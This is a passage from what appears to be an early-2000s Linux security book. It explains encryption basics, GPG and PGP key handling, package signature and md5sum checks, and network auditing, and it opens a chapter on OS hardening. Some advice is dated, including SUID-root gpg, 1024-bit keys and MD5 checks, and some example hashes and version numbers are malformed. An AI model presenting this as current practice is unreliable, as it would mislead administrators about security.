car is that person’s honesty +and his or her knowledge of what your car looks like.If that person wanted to, +he or she could find your car,open it,and drive away. +The use of symmetric encryption across an untrusted network such as the +Internet (or,really,your LAN or enterprise network) presents the same problem +www.syngress.com + +138_linux_01 6/20/01 9:25 AM Page 18 +18 Chapter 1 • Introduction to Open Source Security +as the use of a single car key:anyone who intercepts your symmetric key with a +packet sniffer can decrypt your messages.This type of attack is a sniffing attack.A +sniffing attack is a type of man-in-the-middle attack,where a host that resides in +the middle of a connection is able to obtain and then manipulate data.You will +learn more about this type of attack in Chapter 7. +The obvious response to this analogy and the threat of sniffing attacks would +be,“Well,I guess I just won’t send my passwords across the Internet or my net- +work.”However,it has traditionally been very difficult to get your job done +without sending passwords across the Internet.The ability to communicate +securely is the backbone of e-commerce and network communication.So,how +will you get that password to a person? Even if you use a telephone (a very slow, +awkward option),you are not guaranteed safety.After all,your friend who +receives this password could write it down on a sticky note,exposing it to anyone +passing by.Besides,what if you needed to get a password not to a person,but to a +network host? +Another problem with the use of symmetric encryption is that if someone +sniffs your symmetrically encrypted message,it is possible for this person to use a +password-cracking program to guess the password (the key) you used to encrypt +the message.This type of application effectively reverse-engineers the password +creation process by taking multiple guesses to try and find the answer.Such appli- +cations include L0phtCrack (www.atstake.com/research/redirect.html) and John +the Ripper (available at various sites,including http://packetstorm.securify.com). +Using such applications,a suitably powerful computer,and enough time,a person +can guess the right password.This type of attack is called a brute-force attack. +Asymmetric Key Encryption +One of the answers to sniffing and brute-force attacks is the use of a pair of keys. +Asymmetric encryption allows you to do two things: +(cid:2) Encrypt transmissions +(cid:2) Authenticate users and hosts +For example,suppose that the car key you had in the earlier example con- +cerning symmetric encryption was only part of the key necessary to unlock and +start the car.Suppose further that this physical key,which you can now publicly +distribute,was related to another key locked in your car,and that this locked key +then had a way to ask any holder of your public key to further authenticate him- +www.syngress.com + +138_linux_01 6/20/01 9:25 AM Page 19 +Introduction to Open Source Security • Chapter 1 19 +self before he gained access to use your car.This is basically how asymmetric key +encryption works. +The public key can be distributed to anyone.It can be placed on public key +servers all over the Internet or to anyone you know (or don’t know,for that +matter).However,the private key must be kept,as you might have already +guessed,private.The easiest way to understand public key encryption is to under- +stand the relationship between each key pair.Each pair is generated at the same +time.The algorithm that creates the key pair ensures that this pair is so related +that one half of this pair can decrypt the other half. +Public Key and Trust Relationships +Let’s say that you have generated a key pair.The private key is (hopefully) stored +safely on your hard drive,and you are ready to distribute your public key.Your +friend has done the same:she has created her private key and is ready to give you +her public key.Before both of you can use asymmetric key encryption,you must +give each other your public keys. +Giving your public key to another person (or host) is often called establishing +a trust relationship.Once you have given each other your public keys,you both +can then engage in asymmetric key encryption.How? You compose a message, +and then you encrypt this message to your friend’s public key.Once this message +is encrypted,no one but your friend can read this message.Even though you cre- +ated the message,you cannot read it either,because you encrypted it to your +friend’s public key. +So,all you have to do now is find a way to get this message to your friend. +Once you use e-mail or FTP to do this,your friend receives a bunch of garbled +text that means nothing.This is the encrypted message.Your friend can then take +this message and then decrypt it using her private key.Once this message is +decrypted,your friend can read it.With any luck,your friend won’t still think +that she received a bunch of garbled text that means nothing.Figure 1.7 illus- +trates this process. +In Figure 1.7,User A on System A encrypts his message to User B’s public +key.In order to encrypt the message to User B’s public key,User A must first +enter a password to use his public key to sign the message.The encrypted and +signed message is then sent across the Internet,where User B uses her private key +to decrypt the message. +How has this process solved the symmetric encryption problem? First,the only +way that your message can be unencrypted is by using your friend’s private key. +www.syngress.com + +138_linux_01 6/20/01 9:25 AM Page 20 +20 Chapter 1 • Introduction to Open Source Security +Figure 1.7 Using Public Keys to Encrypt Transmissions +User A's +Private Key +System A +User User A's +B's Public Key Public Key +The Internet +System B +User B's +Private Key +As long as this key remains private,then chances are,so will your letter.Second, +notice that you and your friend did not have to distribute the whole password in +some way.You only distributed half of the password (the public key).And,usually, +it is extremely difficult to guess the private key from the public key.It is,of +course,mathematically possible to use the public key to guess the private key,but +it would take many million-dollar-plus supercomputers several months to do this. +Only state-run organizations such as Scotland Yard and the CIA are likely to +devote such resources to your little old message. +As far as authentication is concerned,asymmetric encryption accomplishes +this by verifying the owner of the public key.You will learn more about this as +you learn about IPSec and VPNs later in this book. +One-Way Encryption +You may ask yourself why anyone would want to irretrievably encrypt a piece +of information.After all,doing this makes the information,well,irretrievable—it +can’t be used anymore.One-way encryption is not useful for encrypting and +www.syngress.com + +138_linux_01 6/20/01 9:26 AM Page 21 +Introduction to Open Source Security • Chapter 1 21 +unencrypting files.It is,however,useful for obtaining a file’s signature.A signature +is obtained by running a one-way encryption algorithm on the file.The resulting +value,called a hash,is closely related to the contents of the file.This value is so +related that if even the slightest change is made to the file’s contents,the hash +value will not match.Many applications use one-way encryption to ensure that +information is not altered as it passes over the network. +GNU Privacy Guard +GNU Privacy Guard (GPG) is one of the primary open source tools in use +today.You can download it from www.gnupg.org.You can download binaries and +source code for all Unix versions.For Linux,g-zipped archives and RPM files are +both available.Most distributions (TurboLinux,Red Hat,Caldera,Slackware,etc.) +include GPG in their source files.Using GPG,you will be able to encrypt files +and e-mail messages.You will also be able to import and export public keys in +order to verify PGP- and GPG-generated keys from the tarballs and RPM files +you download. +Deploying GNU Privacy Guard +Although many GUI interfaces are in the planning stage for GPG,the following +steps focus on using GPG with the command line.The steps assume that you +already have GPG installed on your system.Verify this by using the whereis +command: +whereis gpg +gpg: /usr/bin/gpg +If you do not have GPG installed,you can download GPG from +www.rpmfind.net,from www.gnupg.org/download.html,or from the CD +that accompanies this book (gnupg-1.0.4-11.i386.rpm or the equivalent +gnupg-1.0.5.tar.gz). +Now that you know the program is installed,your first step is to secure how +it allocates memory to nonroot users.GPG requires that most Linux systems run +it as SUID root.Any application allocates pages of memory from the system,and +GPG wants this memory to be secure.Otherwise,an illicit user could capture this +memory and then gain access to the information you are going to encrypt.In +order to secure these memory pages,GPG locks this memory before using it.It +needs to run as root to lock the memory.As soon as this is done,GPG then runs +under the permissions of the owner. +www.syngress.com + +138_linux_01 6/20/01 9:26 AM Page 22 +22 Chapter 1 • Introduction to Open Source Security +NOTE +Running an application as SUID root means that the application is run as +root, even though the owner who starts it is a nonroot user. +By default,however,GPG is not installed as SUID root.To make it setuid +root,do the following: +1. Find the application (in Red Hat Linux,GPG is at /usr/bin/gpg). +2. If you are not already root,become root with the command su. +3. Issue the command chmod u+s /usr/bin/gpg. +If you cannot do this on your own system for some reason,or do not wish +to,you can enter the following line into the ~/.gnupg/options file of any non- +root user: +/usr/bin/gpg --gen-key +This command will create the necessary directories and files for GPG to +work.Once you create these directories,generate a key pair for the user you are +logged in as.You do this by issuing the gpg --genkey command again. +GPG will then ask you to select a key type.You will have the option of +choosing Digital Signature Algorithm (DSA) and ElGamal (the default) +DSA,or ElGamal (sign and encrypt).Each of these options defines different +types of signature and encryption algorithms.The first uses both the standard +ElGamal key distribution method and the DSA,which is used to sign and +encrypt data.DSA is a nonproprietary algorithm,unlike the RSA algorithm, +which was previously used.If you only wish to sign and encrypt documents,you +can just use DSA.Most people use the first option,which is to both sign and +encrypt information.Traditionally,the first choice (the default) is the best. +You are then given the choice of the keysize.The default keysize of 1024 bits +is actually quite sufficient for most purposes.Selecting anything higher can signif- +icantly slow your application.So,select 1,and then press ENTER. +Enter 1y to make your key expire one year from now,and then press ENTER. +Press y to confirm this choice. +Enter your name in the Real name: field. +www.syngress.com + +138_linux_01 6/20/01 9:26 AM Page 23 +Introduction to Open Source Security • Chapter 1 23 +WARNING +You should write down the e-mail address that you use. You will use this +address to refer to your public and private key often, when using GPG +or PGP. +Next,enter your e-mail address.In the Comment: field,enter GPG +signature,or any text you wish,and then press ENTER. +You will then be asked to confirm your settings.If you are happy with what +you entered,press O (that’s the letter O,not the digit 0),and then press ENTER. +Enter a passphrase for your private key.This passphrase should be sufficiently +long (at least six passwords),but should also be something you will remember.Press +ENTER,confirm the passphrase,and press ENTER again.After doing this,GPG will +generate a new key.Move your mouse and/or enter text into the keyboard so that +the machine has enough entropy to generate a good private key.Once GPG is fin- +ished,you will receive a message that your key is created and signed. +Now,verify that GPG correctly created and signed keys for your account +with the following commands: +gpg --list-secret-key +gpg --list-public-key +gpg --list-sig +These commands list your secret key,your public key,and your signature, +respectively.Once you do this,you should create a revocation certificate in case +you need to publish the fact that your private key is no longer valid.You do this +by following the sequence outlined here: +gpg --output revoke.asc --gen-revoke james@root.test.com +sec 1024D/3B386145 2000-07-01 jamesroot (root) +Create a revocation certificate for this key? y +Please select the reason for the revocation: +1 = Key has been compromised +2 = Key is superseded +3 = Key is no longer used +0 = Cancel +(Probably you want to select 1 here) +www.syngress.com + +138_linux_01 6/20/01 9:26 AM Page 24 +24 Chapter 1 • Introduction to Open Source Security +Your decision? 1 +Enter an optional description; end it with an empty line: +> For my keats system root account +> +Reason for revocation: Key has been compromised +For my keats system root account +Is this okay? y +You need a passphrase to unlock the secret key for user: "jamesroot +(root) " +1024-bit DSA key, ID 3B386145, created 2000-07-01 +ASCII armored output forced. +Revocation certificate created. +Please move it to a medium which you can hide away; if Mallory gets +access to this certificate he can use it to make your key unusable. +It is smart to print this certificate and store it away, just in case +your media become unreadable. But have some caution: The print system +of your machine might store the data and make it available to others! +After verifying that you have keys and a revocation certificate,you are now +able to import and export keys.To export your key,use the following command: +gpg --export --armor > yourname.asc +This command will create a file that contains your public key.You can then +distribute this key to anyone and establish a trust relationship. +With this capability,you now can use the RPM command to check the sig- +natures and public keys generated by others.For example,suppose you wish to +update your version of Red Hat Linux due to a security alert.To help you verify +that this package has not been tampered with,and that it has truly originated +from Red Hat,you can obtain Red Hat’s signature.Go to www.redhat.com and +obtain the public key for the site and the RPM-based download you want. +Figure 1.8 shows Red Hat’s public key.As of this writing,the key is located at +www.redhat.com/about/contact/redhat2.asc. +Now that you have created your own key ring,which is where you will store +the public keys of the people with whom you wish to communicate,you can now +import the Red Hat public key into GPG using the following GPG command: +gpg --import redhat2.asc +www.syngress.com + +138_linux_01 6/20/01 9:26 AM Page 25 +Introduction to Open Source Security • Chapter 1 25 +Figure 1.8 The Red Hat Linux Public Key +It is possible that the public key you wish to import has a different extension. +Now,sign this key.Failure to sign this key will cause it to return error messages +when you try to use it.Make sure that you have made absolutely no changes to +this key file.Once this key is imported,you need to sign it.Remember,you just +downloaded it from a trusted source,and are reasonably sure that you can trust +this key.You can sign it using the gpg --sign command,or you can use GPG’s +interactive mode,shown in the following sequence: +gpg --edit-key security@redhat.com +gpg (GnuPG) 1.0.2; Copyright (C) 2000 Free Software Foundation, Inc. +This program comes with ABSOLUTELY NO WARRANTY. +This is free software, and you are welcome to redistribute it +under certain conditions. See the file COPYING for details. +pub 1024D/DB42A60E created: 1999-09-23 expires: never trust: -/f +sub 2048g/961630A2 created: 1999-09-23 expires: never +(1) Red Hat, Inc +Command> sign +Are you really sure that you want to sign this key +with your key: "yourkey (key) " +www.syngress.com + +138_linux_01 6/20/01 9:26 AM Page 26 +26 Chapter 1 • Introduction to Open Source Security +Really sign? y +You need a passphrase to unlock the secret key for +user: "jamesroot (root) " +1024-bit DSA key, ID 3B386145, created 2000-07-01 +Command> q +Save changes y +Now,you can issue the following command to check the latest GNU GPG +RPM file: +rpm -Kv your_rpm.i386.rpm +You will receive a message that both the MD5 signature and the PGP signa- +ture are acceptable: +rpm -Kv your_rpm.i386.rpm +your_rpm.i386.rpm: +MD5 sum OK: fc28444c7c7dee7d59671ac5e27b2ad0 +gpg: Signature made Wed 30 Aug 2000 03:16:54 PM PDT using DSA key +IDDB42A60E +gpg: Good signature from "Red Hat, Inc " +NOTE +Two major ways exist to create and verify signatures. The open source +alternative is GPG. The older, but now proprietary, method is through the +use of Pretty Good Privacy (PGP). The latest versions of GPG are compat- +ible with PGP versions 5.0 and later. However, if a signature was made +using PGP 2.6 or earlier, GPG will not be able to read it. PGP version 2.6 +and earlier used the IDEA algorithm, which is patented. +If you do not find a message similar to this,but instead find a message that +reads public key not found,then you know that this public key is not valid for this +RPM.You will either have to find the right public key,or find another RPM. +You can,of course,use GPG to verify any public key you wish.You have now +configured and used GPG to help ensure that the file you are installing is safe. +www.syngress.com + +138_linux_01 6/20/01 9:26 AM Page 27 +Introduction to Open Source Security • Chapter 1 27 +NOTE +If, while working with GPG, you receive a message that reads gpg: waiting +for lock, then a previous instance of GPG had a problem while working +with either the public or the private key. As a result, the public and/or pri- +vate key ring in the hidden ~./.gnupg directory is locked. Go to the +~./.gnupg directory and remove any file that ends in a .lock extension. +Installing PGP +Although GPG has become a standard,you can also use the PGP program,which +behaves rather differently.You can download PGP from the Massachusetts Institute +of Technology Web site at http://web.mit.edu/network/pgp-form.html.You will +then have to repeat many of the earlier steps to create a public and private key,and +then import the site’s key.Because PGP (and GPG,for that matter) enables pow- +erful encryption,MIT will ask you questions concerning your intentions for PGP. +Answer these according to your intentions.If you enter the right answers,you will +be able to download PGP.Choose the correct file for your distribution. +1. MIT uses gzip to compress the RPM files.If you are using Red Hat +Linux,the RPM package works best.Use tar to unzip and un-tar the +RPM package:tar -zxvf pgprpmfile.tar.gz. +2. This process will deposit an RPM file.Run RPM to install it:rpm -ivh +pgprpmfile. +3. Once you have installed PGP,issue the following command to create a +key pair:pgp -kg. +4. Choose the DSS/DH option,which is the default. +5. Choose 1 to generate a new signing key. +6. You will be asked to choose the size of your key.Enter 1024,and then +press ENTER. +7. Enter a user ID for your public key.Enter your name and e-mail address. +This will become your PGP username.This is important,as you will see +later when it comes time to edit the RPM configuration file. +8. Enter 0 to keep the key forever.Don’t worry,you can revoke it and +generate a new key pair later. +www.syngress.com + +138_linux_01 6/20/01 9:26 AM Page 28 +28 Chapter 1 • Introduction to Open Source Security +9. Enter a passphrase.Make sure this is a solid passphrase (over eight char- +acters,containing at least one capital letter and one nonstandard char- +acter),but also one that you can remember.Confirm your password by +entering it again. +10. You will be asked if you need an encryption key.Press y,and then press +ENTER. +11. The choice of key size is up to you.Just remember that the larger the +key size,the slower information will be processed.Most people choose +either 1024 or 2048. +12. Enter 0 as the “validity period.”As before,this value means that the key +is valid forever. +13. PGP will ask you to press random keys on the keyboard so that it can +generate enough entropy. +14. When PGP is finished,it will ask you if you want to make this key the +default signing key.Press y to indicate yes. +15. Now,you need to enter the public key of the GNU GPG RPM.You +do this with the following command:pgp --ka gnugpg.publickey. +16. You will see a list of keys.Indicate that you wish to add these keys to +your key ring by pressing y. +17. You will see that several new keys and signatures have been added. +18. Now,you must edit the macros file for your version of RPM.In Red +Hat 7.0,this file is in //usr/lib/rpm/macros.Find the following values +and change the values according to your own information: +%_pgp_name your PGP user name +%_pgp_path The path to your public key. For example, /root/.pgp/ +Instead of taking this second step,you can set the PGPPATH vari- +able in your bash_profile file. +19. You can now use RPM to verify your RPM: +rpm -Kv your_rpm.i386.rpm +your_rpm.i386.rpm: +MD5 sum OK: fc28444c7c7dee7d59671ac5e27b2ad0 +gpg: Signature made Wed 30 Aug 2000 03:16:54 PM PDT using DSA +key IDDB42A60E +www.syngress.com + +138_linux_01 6/20/01 9:26 AM Page 29 +Introduction to Open Source Security • Chapter 1 29 +gpg: Good signature from "Red Hat, Inc " +If you want to learn more about PGP,read the man pages,or issue +the following commands: +pgp –h +pgp -k +This book focuses on using GPG. +NOTE +Thus far, you have learned how to use GPG with the RPM package. Of +course, GPG has many other uses. Once you have engaged in a trust +relationship with the recipient, you can encrypt files to this person. The +following command can encrypt a file named managerreport.txt: +gpg --encrypt --r public_keyname_of_recipient managerreport.txt. +You will have to enter the password of your private key. Hopefully, +you can remember it; otherwise, you will have to generate a new pri- +vate/public key pair. After you enter your passphrase, GPG will create a +file named managerreport.txt.gpg. +You can then send this key to the intended recipient, who can then +decrypt it with the following command: gpg --decrypt managerreport +.txt.gpg > managerreport.txt. +The recipient will, of course, have to enter his or her passphrase to +decrypt the message and read it. +To create a signature file, you can create an empty file named your- +name, and then enter the following command: host# gpg --clearsign +yourname. +You will then be asked to enter your password. After this sequence is +completed, you will see a new file named yourname.asc, which has your +signature in it. +Skipping Public Key Verification +If you want to check a signature to ensure that the contents haven’t been +changed,and don’t really wish to verify the original author’s public key,enter the +following command: +rpm -K --nopgp rpmfile.i386.rpm +rpmfile.i386.rpm: md5 gpg OK +www.syngress.com + +138_linux_01 6/20/01 9:26 AM Page 30 +30 Chapter 1 • Introduction to Open Source Security +Using GPG to Verify Signatures +on Tarball Packages +Follow these steps to verify the signature of a gzipped tarball: +1. Add the public key of the person or organization that created the +package. +2. Sign the public key using GPG.You can either use GPG’s --sign com- +mand,or you can enter GPG’s interactive mode. +3. Once you have added and signed the public key of the person who +owns the package,enter the following command:gpg --verify +signaturefile.tar.gz taballpackage.gz. +You will then receive a message either that the signature is good,or that the +public key cannot be found.If the public key cannot be found,you must obtain +another public key,or you will not be able to verify who owns the package. +Using Md5sum +Sometimes,a developer will use the md5sum command to generate a hash of the +file.You can use this hash and the md5sum command to ensure that the file has +not been altered.The easiest way to do this is to read the hash that the developer +generated,download the binary in question,and then run md5sum against it. +For example,suppose that you learn that the wu-ftpd daemon (the daemon +responsible for providing FTP on many sites) has a security problem.You wish to +install the latest secure version.After downloading it,you run md5sum against +the file: +md5sum wu-ftpd-2.8.1-6.i386.rpm +t412cfhh5bf1376cia9da6c5dd86a463 wu-ftpd-2.6.1-6.i386.rpm +However,you notice that the developer’s md5sum value for the same pro- +gram reads as follows: +y415cfgz5bf1356cib8da6c5dd8da0k5 +You should then delete the file and find another source where you can verify +the md5sum hash. +www.syngress.com + +138_linux_01 6/20/01 9:26 AM Page 31 +Introduction to Open Source Security • Chapter 1 31 +Auditing Procedures +As you use the software discussed in this book,you will generally be deploying it +assuming three major roles,which we discuss in the next sections: +(cid:2) Locking down your network +(cid:2) Securing data across the network +(cid:2) Protecting the network perimeter +Locking Down Your Network Hosts +As you lock down your network,you will have to focus on individual hosts.As +shown in Figure 1.9,you will audit the daemons that this host runs.For example, +you will use scanners to determine what ports are open,and if those daemons pre- +sent a danger to your system.An auditor also seeks to enhance login security,to +enhance logging,and to discover what,if any,virus protection measures are present. +Figure 1.9 System Aspects to Audit +Daemons (Web, FTP, and so forth) +Login Security +Enhanced Logging +Audited System +Virus Protection and Intrusion +Detection +Another part of scanning local systems is enabling ways to detect unautho- +rized login.As you approach your systems using the open source tools in this +book,you will find that many are geared to help you enhance the security in +each of these areas. +www.syngress.com + +138_linux_01 6/20/01 9:26 AM Page 32 +32 Chapter 1 • Introduction to Open Source Security +Securing Data across the Network +Figure 1.10 shows how it is possible to create an auditing station on a network. +This station can monitor the transmissions from other hosts.The auditing host +has the following responsibilities: +(cid:2) Obtain relevant data concerning the network without affecting the +performance of the network. +(cid:2) Provide remote administration capabilities. +(cid:2) Generate logs so that information can be carefully scanned. +Figure 1.10 Auditing Network Transmissions +Auditing Station +Network Host Network Host +Network +Network Host Network Host +Intrusion detection systems can use this structure,although structures that are +more complex exist.For example,it is possible to divide the tasks of the auditing +host among multiple hosts.The chief benefit of dividing tasks is redundancy—if +one element of the network goes down,the network can still be monitored and +protected. +The structure outlined previously can be responsible for passive monitoring or +active monitoring.Passive monitoring is simply the ability to listen to network +traffic and log it.Active monitoring involves the ability to either: +www.syngress.com + +138_linux_01 6/20/01 9:26 AM Page 33 +Introduction to Open Source Security • Chapter 1 33 +(cid:2) Monitor traffic and then send alerts concerning the traffic that is +discovered. +(cid:2) Actually intercept and forbid this traffic. +You will learn more about intrusion detection in later chapters. +Protecting the Network Perimeter +As you configure your firewall to establish a network perimeter,you will have to +take the following actions: +(cid:2) Logging +(cid:2) Firewall reconfiguration +(cid:2) Troubleshooting +(cid:2) Enabling and disabling traffic emanating from inside the network +(cid:2) Enabling and disabling traffic emanating from outside the network +Figure 1.11 shows two networks communicating over the Internet.Each uses +a firewall to monitor,log,and forbid traffic.As you audit,you will have to per- +form the following tasks: +(cid:2) Use tools to send packets that traverse the firewall.These packets will +help you determine just how well your firewall limits traffic. +(cid:2) Determine which internal services require access outside of the firewall. +(cid:2) Redirect packets from a proxy server to your firewall. +(cid:2) Scan logs to determine if any break-ins have occurred. +www.syngress.com + +138_linux_01 6/20/01 9:26 AM Page 34 +34 Chapter 1 • Introduction to Open Source Security +Figure 1.11 Auditing a Firewall +Host Host +Ethernet +Host Host +Firewall +Internet +Firewall +Host Host +Ethernet +Host Host +www.syngress.com + +138_linux_01 6/20/01 9:26 AM Page 35 +Introduction to Open Source Security • Chapter 1 35 +Summary +This introduction provided practical knowledge of the open source community, +and how it can help you with your security concerns.You learned about several +key open source sites,how the open source movement protects software instead +of individuals and corporations,and you reviewed your knowledge of encryption. +You learned how to verify the integrity of the files you download from +people you don’t know.Using GPG (and,if you wish,PGP),you can verify +RPM and tarball packages. +This book is designed to deploy open source tools in three key areas (host +security,network security,and perimeter security).We hope that this book will be +of practical importance to you.It is designed to give you advice concerning trou- +bleshooting Linux using open source tools. +Solutions Fast Track +Using the GNU General Public License +(cid:59) The GPL protects the software code,not a corporation or an individual. +(cid:59) Protecting code rather than individuals is a radical change,because it +allows code to be improved upon without being made completely +proprietary. +(cid:59) Open source code does not necessarily have to be free.For example, +companies such as Red Hat and Caldera sell their products,which are +based on the open source Linux kernel. +Soft Skills: Coping with Open Source Quirks +(cid:59) As you use open source code,remember that this code may represent a +work in progress. +(cid:59) Sometimes,open source code changes radically,forcing you to retrain +users.You may find that updates happen irregularly,and that it is some- +times more challenging to update open source code.Furthermore,once +you upgrade the code,you may be presented with an application that +behaves very differently,or has a radically different interface. +www.syngress.com + +138_linux_01 6/20/01 9:26 AM Page 36 +36 Chapter 1 • Introduction to Open Source Security +(cid:59) Before installing open source software,make sure that your operating +system contains all of the necessary supporting applications and libraries. +Should I Use an RPM or Tarballs? +(cid:59) RPMs sometimes offer convenience.However,precompiled RPMs often +do not have all of the features necessary to implement a truly useful +product. +(cid:59) Tarballs often require editing of a special file called a makefile.However, +this is not necessarily all that difficult.It simply requires that you know +where your supporting applications and libraries are.Also,most open +source software will contain instructions concerning how to edit the +makefile.Most well-known operating systems,such as Red Hat Linux +and Slackware,do not require makefile modification. +(cid:59) RPMs often contain useful startup scripts that are not found elsewhere. +Sometimes,it is useful to install the RPM,then the tarball version,and +then combine elements from the two for a complete solution. +Obtaining Open Source Software +(cid:59) Sites such as SourceForge (www.sourceforge.com),RPMFind +(www.rpmfind.net),and SecurityFocus (www.securityfocus.com) are +valuable software sources. +(cid:59) Be especially careful when downloading any source code,regardless of +format.Digital signatures can help you determine the author of a +package,as well as whether a package has been altered. +(cid:59) The Gnu Privacy Guard (GPG) and Pretty Good Privacy (PGP) pack- +ages are available to help you verify signatures.They do not stop the +execution of malicious code,however.They simply inform you about +the nature of the code’s author,and of any changes that may have +occurred to the code. +www.syngress.com + +138_linux_01 6/20/01 9:26 AM Page 37 +Introduction to Open Source Security • Chapter 1 37 +A Brief Encryption Review +(cid:59) Symmetric encryption is the use of one key to encrypt and decrypt +information.If a malicious user is able to intercept the key,he or she can +then use it to decrypt your secret messages. +(cid:59) Asymmetric encryption uses a mathematically related key pair to encrypt +and decrypt information.This type of encryption is commonly used on +the Internet and on LANs,because it reduces the likelihood that the key +can be learned by a malicious user,and aids in authentication. +(cid:59) One-way encryption is the use of an algorithm to encrypt information +so that it is,mathematically speaking,impossible to unencrypt.One-way +encryption is also used to read a file and then create a hash of that file. +The resulting hash value is said to be mathematically unrecoverable. +Hash code is often used to compare one value to another during the +login process:the person logging in enters a username and password,and +the authentication mechanism creates a hash of these two values and +compares it to the hash values generated from the /etc/passwd and +/etc/shadow databases.If the values match,access is allowed. +Public Key and Trust Relationships +(cid:59) You must generate a key pair to begin using your public key to authen- +ticate yourself or to encrypt network transmissions. +(cid:59) Establishing a trust relationship involves exchanging public keys. +Sometimes,individual users must give public keys.At other times,public +keys are exchanged between network hosts. +(cid:59) Never reveal your private key.If your private key is made available to a +third party,this person will be able to read all of your encrypted files. +Auditing Procedures +(cid:59) As an auditor,your job is to lock down your network,which means that +you must consider the security of each host using tools that allow you to +determine changes in files and directories,and who has scanned and +accessed your system.You must also monitor network transmission and +www.syngress.com + +138_linux_01 6/20/01 9:26 AM Page 38 +38 Chapter 1 • Introduction to Open Source Security +configure your firewall to establish an effective network perimeter that +separates your network from all others. +(cid:59) An Intrusion Detection System (IDS) acts as an auditing host or series of +auditing hosts that allow you to monitor and secure data as it passes +across the network. +(cid:59) Protecting the network perimeter involves proper firewall and proxy +server configuration,logging,and monitoring. +Frequently Asked Questions +The following Frequently Asked Questions, answered by the authors of this book, +are designed to both measure your understanding of the concepts presented in +this chapter and to assist you with real-life implementation of these concepts. To +have your questions about this chapter answered by the author, browse to +www.syngress.com/solutions and click on the “Ask the Author” form. +Q: Copyright has been around a long time.I don’t understand all of the fuss +people are making about the GPL.Can’t people just create code and not pro- +vide a license at all? +A: The GPL protects the source code of an application so that it always remains +public.No one person can then patent this code and make it his or her own. +If you were to create a piece of software and not license it,then very quickly, +this code could become proprietary.The creators of the GPL hope that as +more and more people view the same piece of code,it will improve,and +everyone will benefit. +Q: When verifying a signature with GPG,I keep getting a message that the +public key can’t be found,even though I know that I loaded the public key +into GPG.What is wrong with RPM and/or PGP? +A: Nothing.There is something wrong with the package you downloaded. +Either that,or you somehow made an inadvertent change to the public key +before you imported it. +Q: The BSD version of Unix existed before Linux.Why has Linux become so +popular? +www.syngress.com + +138_linux_01 6/20/01 9:26 AM Page 39 +Introduction to Open Source Security • Chapter 1 39 +A: One reason is because Linux follows the GNU GPL,which has allowed the +open source community to embrace it and develop many,many applications +and daemons for it.Also,the Regents of the University of California held the +copyright for all of the BSD developed code.It was not always available in +source.One of the reasons for that is that until BSD 4.4,there was still pro- +prietary AT&T source code in the BSD distributions.One of the specific +objectives of BSD 4.4 was to eliminate any AT&T property.Therefore,while +BSD was still license encumbered,Linux was freely available (in source and +binary). +Q: In your auditing discussion,you discuss the idea of passive and active auditing. +Don’t intrusion detection applications also do signature-based and anomaly- +based detection? +A: Yes,they do.You will learn more about these two intrusion detection +methods in later chapters.Signature-based detection means that you predefine +what an attack looks like,and then configure your network monitoring soft- +ware to look for that signature.Anomaly-based detection requires the intru- +sion detection system to actually listen to the network and gather evidence +about “normal”traffic.Then,if any traffic occurs that seems different,the +intrusion detection system will respond by,for example,sending out an alert +to the network administrator. +www.syngress.com + +138_linux_01 6/20/01 9:26 AM Page 40 + +138_linux_02 6/20/01 9:33 AM Page 41 +Chapter 2 +Hardening the +Operating System +Solutions in this chapter: +(cid:2) Updating the Operating System +(cid:2) Handling Maintenance Issues +(cid:2) Manually Disabling Unnecessary Services +and Ports +(cid:2) Locking Down Ports +(cid:2) Hardening the System with Bastille +(cid:2) Controlling and Auditing Root Access +with Sudo +(cid:2) Managing Your Log Files +(cid:2) Using Logging Enhancers +(cid:59) Summary +(cid:59) Solutions Fast Track +(cid:59) Frequently Asked Questions +41 + +138_linux_02 6/20/01 9:33 AM Page 42 +42 Chapter 2 • Hardening the Operating System +Introduction +Linux is capable of high-end security;however,the out-of-the-box configurations +must be altered to meet the security needs of most businesses with an Internet +presence.This chapter shows you the steps for securing a Linux system—called +hardening the server—using both manual methods and open source security solu- +tions.The hardening process focuses on the operating system,and is important +regardless of the services offered by the server.The steps will vary slightly +between services,such as e-mail and Hypertext Transfer Protocol (HTTP),but +are essential for protecting any server that is connected to a network,especially +the Internet.Hardening the operating system allows the server to operate effi- +ciently and securely. +This chapter includes the essential steps an administrator must follow to +harden a Unix system;specifically,a Red Hat Linux system.These steps include +updating the system,disabling unnecessary services,locking down ports,logging, +and maintenance.Open source programs allow administrators to automate these +processes using Bastille,sudo,logging enhancers such as SWATCH,and antivirus +software.Before you implement these programs,you should first understand how +to harden a system manually. +Updating the Operating System +An operating system may contain many security vulnerabilities and software bugs +when it is first released.Vendors,such as Red Hat,provide updates to the oper- +ating system to fix these vulnerabilities and bugs.In fact,many consulting firms +recommend that companies do not purchase and implement new operating sys- +tems until the first update is available.In most cases,the first update will fix many +of the problems encountered with the first release of the operating system.In this +section,you will learn where to find the most current Red Hat Linux errata and +updates. +Red Hat Linux Errata and +Update Service Packages +The first step in hardening a Linux server is to apply the most current errata and +Update Service Package to the operating system.The Update Service Package +provides the latest fixes and additions to the operating system.It is a collection of +fixes,corrections,and updates to the Red Hat products,such as bug fixes,security +www.syngress.com + +138_linux_02 6/20/01 9:33 AM Page 43 +Hardening the Operating System • Chapter 2 43 +advisories,package enhancements,and add-on software.Updates can be down- +loaded individually as errata,but it is a good idea to start with the latest Update +Service Package,and then install errata as necessary.However,you must pay to +receive the Update Service Packages,and the errata are free.Many errata and +Update Service Packages are not required upgrades.You need to read the docu- +mentation to determine if you need to install it. +The Update Service Packages include all of the errata in one package to keep +your system up to date.After you pay for the service,you can order Update +Service Packages on CD,or download them directly from the Red Hat Web site. +To find out more about the Update Service Packages,visit www.redhat.com/ +support/services/update.html (Figure 2.1).You will learn more about errata in +the maintenance section of this chapter. +Figure 2.1 Red Hat Errata and Updates +Handling Maintenance Issues +You should apply the latest service pack and updates before the server goes live, +and constantly maintain the server after it is deployed to make sure the most cur- +rent required patches are installed.The more time an operating system is available +to the public,the more time malicious hackers have to exploit discovered vulner- +abilities.Vendors offer patches to fix these vulnerabilities as quickly as possible;in +some cases,the fixes are available at the vendor’s site the same day. +www.syngress.com + +138_linux_02 6/20/01 9:33 AM Page 44 +44 Chapter 2 • Hardening the Operating System +Administrators must also regularly test their systems using security analyzer +software.Security analyzer software scans systems to uncover security vulnerabili- +ties,and recommends fixes to close the security hole.(These tools are discussed +in detail in Chapter 3.) +This section discusses the maintenance required to ensure that your systems +are safe from the daily threats of the Internet. +Red Hat Linux Errata: Fixes and Advisories +Once your Red Hat system is live,you must make sure that the most current +required Red Hat errata are installed.These errata include bug fixes,corrections, +and updates to Red Hat products.You should always check the Red Hat site at 